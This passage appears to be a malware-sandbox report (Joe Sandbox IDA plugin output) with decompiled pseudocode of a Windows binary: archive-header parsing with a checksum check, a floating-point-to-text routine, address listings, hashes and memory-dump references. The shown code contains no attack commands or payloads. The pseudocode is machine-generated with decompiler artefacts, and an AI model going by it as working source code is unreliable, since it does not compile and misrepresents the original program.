													goto L74;
												} else {
													E01002093(_t395, _t541);
													_t319 =  *(_t547 + 0x60);
													__eflags =  *(_t547 + 0x60) - 2;
													if( *(_t547 + 0x60) == 2) {
														L74:
														__eflags =  *(_t547 + 0x6b);
														if(__eflags != 0) {
															E01001F94(__eflags, 0x1c, _t395 + 0x24, _t524);
														}
														goto L84;
													}
													goto L72;
												}
											}
										}
										__eflags = _t290 - _t504;
										if(_t290 > _t504) {
											goto L52;
										}
										goto L51;
									}
								}
								__eflags = _t502 - 4;
								if(_t502 == 4) {
									_t471 = 5;
									memcpy(_t395 + 0x2248, _t395 + 0x21e4, _t471 << 2);
									_t331 = E0100C6E0(_t502);
									__eflags = _t331;
									if(_t331 == 0) {
										 *(_t395 + 0x225c) = E0100C6E0(_t502) & 0x00000001;
										_t335 = E0100C593(_t547 + 0x30) & 0x000000ff;
										 *(_t395 + 0x2260) = _t335;
										__eflags = _t335 - 0x18;
										if(_t335 <= 0x18) {
											E0100C642(_t547 + 0x30, _t395 + 0x2264, 0x10);
											__eflags =  *(_t395 + 0x225c);
											if( *(_t395 + 0x225c) != 0) {
												E0100C642(_t547 + 0x30, _t395 + 0x2274, 8);
												E0100C642(_t547 + 0x30, _t547 + 0x64, 4);
												E0100F8C7(_t547 - 0x74);
												E0100F90D(_t547 - 0x74, _t395 + 0x2274, 8);
												_push(_t547 + 8);
												E0100F7D6(_t547 - 0x74);
												_t350 = E0101FDFA(_t547 + 0x64, _t547 + 8, 4);
												asm("sbb al, al");
												_t352 =  ~_t350 + 1;
												__eflags = _t352;
												 *(_t395 + 0x225c) = _t352;
											}
											 *((char*)(_t395 + 0x6cbc)) = 1;
											goto L84;
										}
										_push(_t335);
										_push(L"hc%u");
										L40:
										_push(0x14);
										_push(_t547);
										E0100400A();
										E01003FB5(_t395, _t395 + 0x24, _t547);
										goto L86;
									}
									_push(_t331);
									_push(L"h%u");
									goto L40;
								}
								__eflags = _t502 - 5;
								if(_t502 == 5) {
									_t480 = _t502;
									memcpy(_t395 + 0x4590, _t395 + 0x21e4, _t480 << 2);
									 *(_t395 + 0x45ac) = E0100C6E0(_t502) & 0x00000001;
									 *((short*)(_t395 + 0x45ae)) = 0;
									 *((char*)(_t395 + 0x45ad)) = 0;
								}
								goto L84;
							}
							_t485 = E0100C6E0(_t500);
							 *(_t547 + 0x54) = _t500;
							_t256 = 0;
							 *(_t547 + 0x58) = _t485;
							__eflags = _t500;
							if(__eflags < 0) {
								goto L30;
							}
							if(__eflags > 0) {
								goto L85;
							}
							__eflags = _t485 -  *(_t395 + 0x21f0);
							if(_t485 >=  *(_t395 + 0x21f0)) {
								goto L85;
							}
							goto L30;
						}
						E0100204E(_t395);
						 *((char*)(_t395 + 0x6cc4)) = 1;
						E01006FC6(0x1040f50, 3);
						__eflags =  *((char*)(_t547 + 0x6a));
						if(__eflags == 0) {
							goto L26;
						} else {
							E01001F94(__eflags, 4, _t395 + 0x24, _t395 + 0x24);
							 *((char*)(_t395 + 0x6cc5)) = 1;
							goto L86;
						}
					}
					L17:
					E01003F74(_t395, _t500);
					goto L86;
				}
				_t500 =  *((intOrPtr*)(_t395 + 0x6cc0)) + 8;
				asm("adc eax, ecx");
				_t559 =  *((intOrPtr*)(_t395 + 0x6ca4));
				if(_t559 < 0 || _t559 <= 0 &&  *((intOrPtr*)(_t395 + 0x6ca0)) <= _t500) {
					goto L15;
				} else {
					 *((char*)(_t547 + 0x6a)) = 1;
					 *0x1033260(_t547 + 0x18, 0x10);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t395 + 0xc))))() != 0x10) {
						goto L17;
					}
					if( *((char*)( *((intOrPtr*)(_t395 + 0x21bc)) + 0x5124)) != 0) {
						L7:
						 *(_t547 + 0x6b) = 1;
						L8:
						E01003DE0(_t395);
						_t531 = _t395 + 0x2264;
						_t546 = _t395 + 0x1028;
						E01006249(_t546, 0, 5,  *((intOrPtr*)(_t395 + 0x21bc)) + 0x5024, _t395 + 0x2264, _t547 + 0x18,  *(_t395 + 0x2260), 0, _t547 + 0x28);
						if( *(_t395 + 0x225c) == 0) {
							L13:
							 *((intOrPtr*)(_t547 + 0x50)) = _t546;
							goto L16;
						} else {
							_t379 = _t395 + 0x2274;
							while(1) {
								_t381 = E0101FDFA(_t547 + 0x28, _t379, 8);
								_t549 = _t549 + 0xc;
								if(_t381 == 0) {
									goto L13;
								}
								_t566 =  *(_t547 + 0x6b);
								_t382 = _t395 + 0x24;
								_push(_t382);
								_push(_t382);
								if( *(_t547 + 0x6b) != 0) {
									_push(6);
									E01001F94(__eflags);
									 *((char*)(_t395 + 0x6cc5)) = 1;
									E01006FC6(0x1040f50, 0xb);
									goto L86;
								}
								_push(0x80);
								E01001F94(_t566);
								E0100EB27( *((intOrPtr*)(_t395 + 0x21bc)) + 0x5024);
								E01003DE0(_t395);
								E01006249(_t546, 0, 5,  *((intOrPtr*)(_t395 + 0x21bc)) + 0x5024, _t531, _t547 + 0x18,  *(_t395 + 0x2260), 0, _t547 + 0x28);
								_t379 = _t395 + 0x2274;
								if( *(_t395 + 0x225c) != 0) {
									continue;
								}
								goto L13;
							}
							goto L13;
						}
					}
					_t393 = E01011356();
					 *(_t547 + 0x6b) = 0;
					if(_t393 == 0) {
						goto L8;
					}
					goto L7;
				}
			}

0x01003281
0x01003282
0x0100328a
0x01003294
0x0100329b
0x010032a2
0x010032a9
0x010032ac
0x010032b5
0x0100340b
0x0100340b
0x0100340e
0x0100340e
0x0100341b
0x0100342c
0x01003433
0x01003443
0x0100344d
0x0100344f
0x01003456
0x01003458
0x01003a88
0x01003a8a
0x01003a8f
0x01003a92
0x01003aa0
0x01003aab
0x01003aab
0x0100345e
0x01003460
0x00000000
0x00000000
0x01003466
0x0100346c
0x0100346e
0x0100346e
0x01003470
0x01003473
0x00000000
0x00000000
0x01003479
0x0100347c
0x00000000
0x00000000
0x01003482
0x01003486
0x0100348b
0x0100348e
0x00000000
0x00000000
0x01003493
0x010034a5
0x010034ab
0x010034b0
0x010034bb
0x010034bd
0x010034c6
0x010034cc
0x010034d2
0x010034d8
0x010034db
0x010034de
0x010034e0
0x0100351a
0x0100351a
0x0100351c
0x01003523
0x01003526
0x01003529
0x01003553
0x01003553
0x0100355a
0x0100355c
0x0100355f
0x01003562
0x01003567
0x0100356c
0x0100356e
0x01003571
0x01003571
0x0100357c
0x01003589
0x01003598
0x010035a1
0x010035a9
0x010035b0
0x010035b6
0x010035b8
0x010039c9
0x010039d8
0x010039d9
0x010039e3
0x010039ec
0x010039f9
0x01003a08
0x01003a13
0x01003a16
0x01003a1c
0x01003a22
0x01003a24
0x01003a2a
0x01003a2d
0x01003a44
0x01003a2f
0x01003a37
0x01003a3f
0x01003a41
0x01003a41
0x01003a4a
0x01003a51
0x01003a5b
0x01003a5b
0x00000000
0x01003a53
0x01003a53
0x01003a59
0x01003a5d
0x01003a5d
0x01003a63
0x01003a68
0x01003a6b
0x01003a7b
0x01003a7b
0x01003a80
0x01003a83
0x00000000
0x01003a83
0x00000000
0x01003a59
0x01003a51
0x010035be
0x00000000
0x00000000
0x010035c4
0x010035c7
0x01003709
0x01003711
0x01003720
0x01003724
0x01003727
0x0100372e
0x01003735
0x01003740
0x01003743
0x01003749
0x01003752
0x01003759
0x01003767
0x01003772
0x01003781
0x01003781
0x01003783
0x01003789
0x0100378f
0x01003796
0x0100379c
0x0100379c
0x010037a2
0x010037a8
0x010037ae
0x010037b4
0x010037ba
0x010037bc
0x010037c4
0x010037c4
0x010037c6
0x00000000
0x010037be
0x010037be
0x010037c8
0x010037c8
0x010037d1
0x010037d7
0x010037dc
0x010037e3
0x010037e6
0x010037f9
0x010037f9
0x010037fe
0x01003805
0x0100380c
0x01003811
0x01003820
0x01003820
0x01003826
0x01003830
0x01003837
0x01003840
0x01003848
0x0100384b
0x0100384e
0x01003851
0x01003853
0x01003853
0x01003865
0x01003879
0x0100387b
0x01003885
0x0100388a
0x01003890
0x01003892
0x0100389c
0x0100389e
0x010038a0
0x010038a0
0x010038a0
0x010038a0
0x01003894
0x01003894
0x01003894
0x010038a7
0x010038b1
0x010038c3
0x010038c9
0x010038cd
0x010038d0
0x010038d6
0x010038e1
0x010038e1
0x010038e1
0x00000000
0x010038d8
0x010038d8
0x010038db
0x00000000
0x00000000
0x010038dd
0x010038e3
0x010038e3
0x010038ef
0x010038f4
0x01003909
0x0100390f
0x0100391e
0x01003923
0x0100392e
0x01003930
0x01003932
0x01003932
0x0100393f
0x01003944
0x01003952
0x01003957
0x0100395a
0x0100395b
0x0100395c
0x01003961
0x01003966
0x01003969
0x01003973
0x01003973
0x01003978
0x0100397b
0x0100397e
0x01003990
0x01003996
0x0100399d
0x0100399f
0x010039a1
0x010039a1
0x00000000
0x01003980
0x01003983
0x01003988
0x0100398b
0x0100398e
0x010039a8
0x010039a8
0x010039ac
0x010039b9
0x010039b9
0x00000000
0x010039ac
0x00000000
0x0100398e
0x0100397e
0x010038d6
0x010037c0
0x010037c2
0x00000000
0x00000000
0x00000000
0x010037c2
0x010037bc
0x010035cd
0x010035d0
0x01003611
0x0100361e
0x01003623
0x01003628
0x0100362a
0x01003661
0x0100366c
0x0100366f
0x01003675
0x01003678
0x0100368e
0x01003693
0x0100369a
0x010036a8
0x010036b6
0x010036bf
0x010036cb
0x010036d3
0x010036d8
0x010036e7
0x010036f1
0x010036f3
0x010036f3
0x010036f5
0x010036f5
0x010036fb
0x00000000
0x010036fb
0x0100367a
0x0100367b
0x01003632
0x01003635
0x01003637
0x01003638
0x0100364a
0x00000000
0x0100364a
0x0100362c
0x0100362d
0x00000000
0x0100362d
0x010035d2
0x010035d5
0x010035dc
0x010035e9
0x010035f5
0x010035fd
0x01003604
0x01003604
0x00000000
0x010035d5
0x01003533
0x01003535
0x01003538
0x0100353a
0x0100353d
0x0100353f
0x00000000
0x00000000
0x01003541
0x00000000
0x00000000
0x01003547
0x0100354d
0x00000000
0x00000000
0x00000000
0x0100354d
0x010034e4
0x010034f0
0x010034f7
0x010034fc
0x01003500
0x00000000
0x01003502
0x01003509
0x0100350e
0x00000000
0x0100350e
0x01003500
0x0100341d
0x0100341f
0x00000000
0x0100341f
0x010032c3
0x010032c6
0x010032c8
0x010032ce
0x00000000
0x010032e2
0x010032ea
0x010032f3
0x01003300
0x00000000
0x00000000
0x01003313
0x01003322
0x01003322
0x01003326
0x01003328
0x01003344
0x01003350
0x0100335c
0x01003368
0x010033e7
0x010033e7
0x00000000
0x0100336a
0x0100336a
0x01003370
0x01003377
0x0100337c
0x01003381
0x00000000
0x00000000
0x01003383
0x01003387
0x0100338a
0x0100338b
0x0100338c
0x010033ec
0x010033ee
0x010033fa
0x01003401
0x00000000
0x01003401
0x0100338e
0x01003393
0x010033a4
0x010033ab
0x010033d3
0x010033df
0x010033e5
0x00000000
0x00000000
0x00000000
0x010033e5
0x00000000
0x01003370
0x01003368
0x01003315
0x0100331a
0x01003320
0x00000000
0x00000000
0x00000000
0x01003320

APIs

__EH_prolog.LIBCMT ref: 0100328A
_memcmp.LIBVCRUNTIME ref: 01003377

Strings

hc%u, xrefs: 0100367B
h%u, xrefs: 0100362D
CMT, xrefs: 01003990

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: H_prolog_memcmp
String ID: CMT$h%u$hc%u
API String ID: 3004599000-3282847064
Opcode ID: fb59d703596a2f8a8b3b413d61d9dbcfc74d252c71dbb1f92a7264923d0341b3
Instruction ID: 713e5c6cbb720f548e3a30dacdc5ef8def11a29576aeb09e5e5cb2a589ecf329
Opcode Fuzzy Hash: fb59d703596a2f8a8b3b413d61d9dbcfc74d252c71dbb1f92a7264923d0341b3
Instruction Fuzzy Hash: 61328E715102859FFB16DF24C895AEA3BE5BF65300F0445BEED8A8F2C2DB74A548CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0102D00E, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 77%

			E0102D00E(void* __ebx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v0;
				signed int _v8;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _v2424;
				void* __edi;
				void* __esi;
				signed int _t725;
				signed int _t735;
				signed int _t736;
				signed int _t740;
				intOrPtr _t742;
				intOrPtr* _t743;
				intOrPtr* _t746;
				signed int _t751;
				signed int _t752;
				signed int _t758;
				signed int _t764;
				intOrPtr _t766;
				void* _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t778;
				signed int _t779;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				signed int _t799;
				signed int _t800;
				signed int _t805;
				signed int _t806;
				signed int _t809;
				signed int _t813;
				signed int _t820;
				signed int* _t823;
				signed int _t826;
				signed int _t837;
				signed int _t838;
				signed int _t840;
				char* _t841;
				signed int _t843;
				signed int _t847;
				signed int _t848;
				signed int _t852;
				signed int _t854;
				signed int _t859;
				signed int _t867;
				signed int _t870;
				signed int _t872;
				signed int _t875;
				signed int _t876;
				signed int _t877;
				signed int _t880;
				signed int _t893;
				signed int _t894;
				signed int _t896;
				char* _t897;
				signed int _t899;
				signed int _t903;
				signed int _t904;
				signed int* _t906;
				signed int _t908;
				signed int _t910;
				signed int _t915;
				signed int _t922;
				signed int _t925;
				signed int _t929;
				signed int* _t936;
				intOrPtr _t938;
				void* _t939;
				intOrPtr* _t941;
				signed int* _t945;
				unsigned int _t956;
				signed int _t957;
				void* _t960;
				signed int _t961;
				void* _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t974;
				signed int _t979;
				signed int _t982;
				unsigned int _t985;
				signed int _t986;
				void* _t989;
				signed int _t990;
				void* _t992;
				signed int _t993;
				signed int _t994;
				signed int _t995;
				signed int _t999;
				signed int* _t1004;
				signed int _t1006;
				signed int _t1016;
				void _t1019;
				signed int _t1022;
				void* _t1025;
				signed int _t1036;
				signed int _t1037;
				signed int _t1040;
				signed int _t1041;
				signed int _t1043;
				signed int _t1044;
				signed int _t1045;
				signed int _t1049;
				signed int _t1053;
				signed int _t1054;
				signed int _t1055;
				signed int _t1057;
				signed int _t1058;
				signed int _t1059;
				signed int _t1060;
				signed int _t1061;
				signed int _t1062;
				signed int _t1064;
				signed int _t1065;
				signed int _t1066;
				signed int _t1067;
				signed int _t1068;
				signed int _t1069;
				unsigned int _t1070;
				void* _t1073;
				intOrPtr _t1075;
				signed int _t1076;
				signed int _t1077;
				signed int _t1078;
				signed int* _t1082;
				void* _t1086;
				void* _t1087;
				signed int _t1088;
				signed int _t1089;
				signed int _t1090;
				signed int _t1093;
				signed int _t1094;
				signed int _t1099;
				signed int _t1101;
				signed int _t1104;
				char _t1109;
				signed int _t1111;
				signed int _t1112;
				signed int _t1113;
				signed int _t1114;
				signed int _t1115;
				signed int _t1116;
				signed int _t1117;
				signed int _t1121;
				signed int _t1122;
				signed int _t1123;
				signed int _t1124;
				signed int _t1125;
				unsigned int _t1128;
				void* _t1132;
				void* _t1133;
				unsigned int _t1134;
				signed int _t1139;
				signed int _t1140;
				signed int _t1142;
				signed int _t1143;
				intOrPtr* _t1145;
				signed int _t1146;
				signed int _t1147;
				signed int _t1150;
				signed int _t1151;
				signed int _t1154;
				signed int _t1156;
				signed int _t1157;
				void* _t1158;
				signed int _t1159;
				signed int _t1160;
				signed int _t1161;
				void* _t1164;
				signed int _t1165;
				signed int _t1166;
				signed int _t1167;
				signed int _t1168;
				signed int _t1169;
				signed int* _t1172;
				signed int _t1173;
				signed int _t1174;
				signed int _t1175;
				signed int _t1176;
				intOrPtr* _t1178;
				intOrPtr* _t1179;
				signed int _t1181;
				signed int _t1183;
				signed int _t1186;
				signed int _t1192;
				signed int _t1196;
				signed int _t1197;
				intOrPtr _t1199;
				intOrPtr _t1200;
				signed int _t1205;
				signed int _t1208;
				signed int _t1209;
				signed int _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int _t1213;
				signed int _t1215;
				signed int _t1216;
				signed int _t1217;
				signed int _t1218;
				signed int _t1220;
				signed int _t1221;
				signed int _t1222;
				signed int _t1223;
				signed int _t1224;
				signed int _t1226;
				signed int _t1227;
				signed int _t1229;
				signed int _t1231;
				signed int _t1233;
				signed int _t1235;
				signed int* _t1237;
				signed int* _t1241;
				signed int _t1250;

				_t725 =  *0x103e668; // 0x7ecdc17e
				_v8 = _t725 ^ _t1235;
				_t1016 = _a20;
				_t1145 = _a16;
				_v1924 = _t1145;
				_v1920 = _t1016;
				E0102CB27( &_v1944, __eflags);
				_t1196 = _a8;
				_t730 = 0x2d;
				if((_t1196 & 0x80000000) == 0) {
					_t730 = 0x120;
				}
				 *_t1145 = _t730;
				 *((intOrPtr*)(_t1145 + 8)) = _t1016;
				_t1146 = _a4;
				if((_t1196 & 0x7ff00000) != 0) {
					L5:
					_t735 = E01029154( &_a4);
					_pop(_t1031);
					__eflags = _t735;
					if(_t735 != 0) {
						_t1031 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t736 = _t735 - 1;
					__eflags = _t736;
					if(_t736 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t751 = _t736 - 1;
						__eflags = _t751;
						if(_t751 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t752 = _t751 - 1;
							__eflags = _t752;
							if(_t752 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t752 == 1;
								if(_t752 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1146;
									_a8 = _t1196 & 0x7fffffff;
									_t1250 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1150 = _v1896;
									_v1916 = _a12 + 1;
									_t1036 = _t1150 >> 0x14;
									_t758 = _t1036 & 0x000007ff;
									__eflags = _t758;
									if(_t758 != 0) {
										_t1101 = 0;
										_t758 = 0;
										__eflags = 0;
									} else {
										_t1101 = 1;
									}
									_t1151 = _t1150 & 0x000fffff;
									_t1019 = _v1900 + _t758;
									asm("adc edi, esi");
									__eflags = _t1101;
									_t1037 = _t1036 & 0x000007ff;
									_t1205 = _t1037 - 0x434 + (0 | _t1101 != 0x00000000) + 1;
									_v1872 = _t1205;
									E0102EC00(_t1037, _t1250);
									_push(_t1037);
									_push(_t1037);
									 *_t1237 = _t1250;
									_t764 = E01031A60(E0102ED10(_t1151, _t1205), _t1250);
									_v1904 = _t764;
									__eflags = _t764 - 0x7fffffff;
									if(_t764 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t764 - 0x80000000;
										if(_t764 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1019;
									__eflags = _t1151;
									_v464 = _t1151;
									_t1022 = (0 | _t1151 != 0x00000000) + 1;
									_v472 = _t1022;
									__eflags = _t1205;
									if(_t1205 < 0) {
										__eflags = _t1205 - 0xfffffc02;
										if(_t1205 == 0xfffffc02) {
											L101:
											_t766 =  *((intOrPtr*)(_t1235 + _t1022 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1040 = 0;
												__eflags = 0;
											} else {
												_t1040 = _t766 + 1;
											}
											_t767 = 0x20;
											_t768 = _t767 - _t1040;
											__eflags = _t768 - 1;
											_t769 = _t768 & 0xffffff00 | _t768 - 0x00000001 > 0x00000000;
											__eflags = _t1022 - 0x73;
											_v1865 = _t769;
											_t1041 = _t1040 & 0xffffff00 | _t1022 - 0x00000073 > 0x00000000;
											__eflags = _t1022 - 0x73;
											if(_t1022 != 0x73) {
												L107:
												_t770 = 0;
												__eflags = 0;
											} else {
												__eflags = _t769;
												if(_t769 == 0) {
													goto L107;
												} else {
													_t770 = 1;
												}
											}
											__eflags = _t1041;
											if(_t1041 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												_push(0);
												_push( &_v1396);
												_push(0x1cc);
												_push( &_v468);
												L313();
												_t1237 =  &(_t1237[4]);
											} else {
												__eflags = _t770;
												if(_t770 != 0) {
													goto L126;
												} else {
													_t1068 = 0x72;
													__eflags = _t1022 - _t1068;
													if(_t1022 < _t1068) {
														_t1068 = _t1022;
													}
													__eflags = _t1068 - 0xffffffff;
													if(_t1068 != 0xffffffff) {
														_t1223 = _t1068;
														_t1178 =  &_v468 + _t1068 * 4;
														_v1880 = _t1178;
														while(1) {
															__eflags = _t1223 - _t1022;
															if(_t1223 >= _t1022) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1178;
															}
															_t210 = _t1223 - 1; // 0x70
															__eflags = _t210 - _t1022;
															if(_t210 >= _t1022) {
																_t1128 = 0;
																__eflags = 0;
															} else {
																_t1128 =  *(_t1178 - 4);
															}
															_t1178 = _t1178 - 4;
															_t936 = _v1880;
															_t1223 = _t1223 - 1;
															 *_t936 = _t1128 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t936 - 4;
															__eflags = _t1223 - 0xffffffff;
															if(_t1223 == 0xffffffff) {
																break;
															}
															_t1022 = _v472;
														}
														_t1205 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1068;
													} else {
														_t218 = _t1068 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1154 = 1 - _t1205;
											E0101F350(_t1154,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1235 + 0xbad63d) = 1 << (_t1154 & 0x0000001f);
											_t778 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1069 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1069;
											__eflags = _t1022 - _t1069;
											if(_t1022 == _t1069) {
												_t1132 = 0;
												__eflags = 0;
												while(1) {
													_t938 =  *((intOrPtr*)(_t1235 + _t1132 - 0x570));
													__eflags = _t938 -  *((intOrPtr*)(_t1235 + _t1132 - 0x1d0));
													if(_t938 !=  *((intOrPtr*)(_t1235 + _t1132 - 0x1d0))) {
														goto L101;
													}
													_t1132 = _t1132 + 4;
													__eflags = _t1132 - 8;
													if(_t1132 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1133 = 0;
															__eflags = 0;
														} else {
															_t1133 = _t938 + 1;
														}
														_t939 = 0x20;
														_t1224 = _t1069;
														__eflags = _t939 - _t1133 - _t1069;
														_t941 =  &_v460;
														_v1880 = _t941;
														_t1179 = _t941;
														_t171 =  &_v1865;
														 *_t171 = _t939 - _t1133 - _t1069 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1224 - _t1022;
															if(_t1224 >= _t1022) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1179;
															}
															_t175 = _t1224 - 1; // 0x0
															__eflags = _t175 - _t1022;
															if(_t175 >= _t1022) {
																_t1134 = 0;
																__eflags = 0;
															} else {
																_t1134 =  *(_t1179 - 4);
															}
															_t1179 = _t1179 - 4;
															_t945 = _v1880;
															_t1224 = _t1224 - 1;
															 *_t945 = _t1134 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t945 - 4;
															__eflags = _t1224 - 0xffffffff;
															if(_t1224 == 0xffffffff) {
																break;
															}
															_t1022 = _v472;
														}
														__eflags = _v1865;
														_t1070 = _t1069 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1069;
														_t1181 = _t1070 >> 5;
														_v1884 = _t1070;
														_t1226 = _t1181 << 2;
														E0101F350(_t1181,  &_v1396, 0, _t1226);
														 *(_t1235 + _t1226 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t778 = _t1181 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t778;
										_t1025 = 0x1cc;
										_v936 = _t778;
										_t779 = _t778 << 2;
										__eflags = _t779;
										_push(_t779);
										_push( &_v1396);
										_push(0x1cc);
										_push( &_v932);
										L313();
										_t1241 =  &(_t1237[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1227 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1227;
										__eflags = _t1022 - _t1227;
										if(_t1022 != _t1227) {
											L53:
											_t956 = _v1872 + 1;
											_t957 = _t956 & 0x0000001f;
											_t1073 = 0x20;
											_v1876 = _t957;
											_t1183 = _t956 >> 5;
											_v1872 = _t1183;
											_v1908 = _t1073 - _t957;
											_t960 = E0101E7C0(1, _t1073 - _t957, 0);
											_t1075 =  *((intOrPtr*)(_t1235 + _t1022 * 4 - 0x1d4));
											_t961 = _t960 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t961;
											_v1912 =  !_t961;
											if( *_t108 == 0) {
												_t1076 = 0;
												__eflags = 0;
											} else {
												_t1076 = _t1075 + 1;
											}
											_t963 = 0x20;
											_t964 = _t963 - _t1076;
											_t1139 = _t1022 + _t1183;
											__eflags = _v1876 - _t964;
											_v1892 = _t1139;
											_t965 = _t964 & 0xffffff00 | _v1876 - _t964 > 0x00000000;
											__eflags = _t1139 - 0x73;
											_v1865 = _t965;
											_t1077 = _t1076 & 0xffffff00 | _t1139 - 0x00000073 > 0x00000000;
											__eflags = _t1139 - 0x73;
											if(_t1139 != 0x73) {
												L59:
												_t966 = 0;
												__eflags = 0;
											} else {
												__eflags = _t965;
												if(_t965 == 0) {
													goto L59;
												} else {
													_t966 = 1;
												}
											}
											__eflags = _t1077;
											if(_t1077 != 0) {
												L81:
												__eflags = 0;
												_t1025 = 0x1cc;
												_push(0);
												_v1400 = 0;
												_v472 = 0;
												_push( &_v1396);
												_push(0x1cc);
												_push( &_v468);
												L313();
												_t1237 =  &(_t1237[4]);
											} else {
												__eflags = _t966;
												if(_t966 != 0) {
													goto L81;
												} else {
													_t1078 = 0x72;
													__eflags = _t1139 - _t1078;
													if(_t1139 >= _t1078) {
														_t1139 = _t1078;
														_v1892 = _t1078;
													}
													_t974 = _t1139;
													_v1880 = _t974;
													__eflags = _t1139 - 0xffffffff;
													if(_t1139 != 0xffffffff) {
														_t1140 = _v1872;
														_t1229 = _t1139 - _t1140;
														__eflags = _t1229;
														_t1082 =  &_v468 + _t1229 * 4;
														_v1888 = _t1082;
														while(1) {
															__eflags = _t974 - _t1140;
															if(_t974 < _t1140) {
																break;
															}
															__eflags = _t1229 - _t1022;
															if(_t1229 >= _t1022) {
																_t1186 = 0;
																__eflags = 0;
															} else {
																_t1186 =  *_t1082;
															}
															__eflags = _t1229 - 1 - _t1022;
															if(_t1229 - 1 >= _t1022) {
																_t979 = 0;
																__eflags = 0;
															} else {
																_t979 =  *(_t1082 - 4);
															}
															_t982 = _v1880;
															_t1082 = _v1888 - 4;
															_v1888 = _t1082;
															 *(_t1235 + _t982 * 4 - 0x1d0) = (_t1186 & _v1884) << _v1876 | (_t979 & _v1912) >> _v1908;
															_t974 = _t982 - 1;
															_t1229 = _t1229 - 1;
															_v1880 = _t974;
															__eflags = _t974 - 0xffffffff;
															if(_t974 != 0xffffffff) {
																_t1022 = _v472;
																continue;
															}
															break;
														}
														_t1139 = _v1892;
														_t1183 = _v1872;
														_t1227 = 2;
													}
													__eflags = _t1183;
													if(_t1183 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1183 << 2);
														_t1237 =  &(_t1237[3]);
													}
													__eflags = _v1865;
													_t1025 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1139;
													} else {
														_v472 = _t1139 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1227;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1086 = 0;
											__eflags = 0;
											while(1) {
